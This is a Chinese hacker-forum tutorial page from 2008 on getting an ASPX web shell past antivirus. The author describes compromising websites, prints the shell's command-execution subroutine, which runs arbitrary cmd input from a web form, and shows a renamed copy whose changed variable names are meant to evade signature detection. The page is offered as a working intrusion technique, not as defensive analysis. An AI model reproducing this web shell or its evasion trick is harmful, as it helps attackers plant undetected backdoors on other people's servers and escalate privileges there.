| 网站首页 | Vip会员区 | 教程 | 软件 | 图片 | QQ家园 | 免费资源 | 在线服务 | 论坛 | 博客 | 程序开发 | It学堂 | 作品发布 | 
站点相关
代刻黑客光盘或订做光盘

精品软件程序定制

为您的网站或者服务器保驾护航
相关内容
最 新 热 门
相 关 文 章
没有相关文章
您现在的位置: 红色黑客联盟 >> 教程 >> 黑客技术 >> 黑客文献 >> 正文
aspx马免杀小技巧
文章录入:7747.Net    责任编辑:7747.Net  更新时间:2008-1-26 0:46:04

【字体:

今天看到华夏BLOG被X了。。。顺着留着的地址去看了。。。
有篇文章转过来。。。唉,我还是太菜


今天黑站的时候,经常用的aspx马怎么也上传不了,断定是被杀了。

要提权就得用aspx马,怎么办呢?网上找不到免杀的马。无赖之下,只有找出马中的特征码。

尝试了好久。终于找到了。LOOK:

Sub RunCMD(Src As Object, E As EventArgs)
 Dim myProcess As New Process()
 Dim myProcessStartInfo As New ProcessStartInfo(cmdPath.Text)
 myProcessStartInfo.UseShellExecute = False
 myProcessStartInfo.RedirectStandardOutput = true
 myProcess.StartInfo = myProcessStartInfo
 myProcessStartInfo.Arguments="/c " & Cmd.text
 myProcess.Start()
 Dim myStreamReader As StreamReader = myProcess.StandardOutput
 Dim myString As String = myStreamReader.Readtoend()
 myProcess.Close()
 mystring=replace(mystring,">","<")
 mystring=replace(mystring,"<","&gt;")
 result.text="Command = " & Cmd.text & vbcrlf & "<ul class='td3'><pre>" & mystring & "</pre></ul>"
 Cmd.text=""
End Sub


就是这段代码被定义了。准确的说是其中的myProcessStartInfo.RedirectStandardOutput = true这句有问题。

可是要提权就要用到cmd.net ,删了还是不行。我的解决方法是把myProcess替换,比如上面代码可以替换成:

Sub RunCMD(Src As Object, E As EventArgs)
 Dim myRedzz As New Process()
 Dim myRedzzStartInfo As New ProcessStartInfo(cmdPath.Text)
 myRedzzStartInfo.UseShellExecute = False
 myRedzzStartInfo.RedirectStandardOutput = true
 myRedzz.StartInfo = myRedzzStartInfo
 myRedzzStartInfo.Arguments="/c " & Cmd.text
 myRedzz.Start()
 Dim myStreamReader As StreamReader = myRedzz.StandardOutput
 Dim myString As String = myStreamReader.Readtoend()
 myRedzz.Close()
 mystring=replace(mystring,">","&lt;")
 mystring=replace(mystring,"<","&gt;")
 result.text="Command = " & Cmd.text & vbcrlf & "<ul class='td3'><pre>" & mystring & "</pre></ul>"
 Cmd.text=""
End Sub


其中把myProcess替换成myRedzz,这样就达到了免杀效果。

可是不是说就绝对免杀了。任何杀毒软件都有不同,需要不断尝试和探索。

您对本文章有什么意见或着疑问吗?请到论坛讨论您的关注和建议是我们前行的参考和动力
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
     | 设为首页 | 加入收藏 | 广告服务 | 我要投稿 | 关于我们 | 版权申明 | 免责声明 | 隐私声明 | 网站地图 |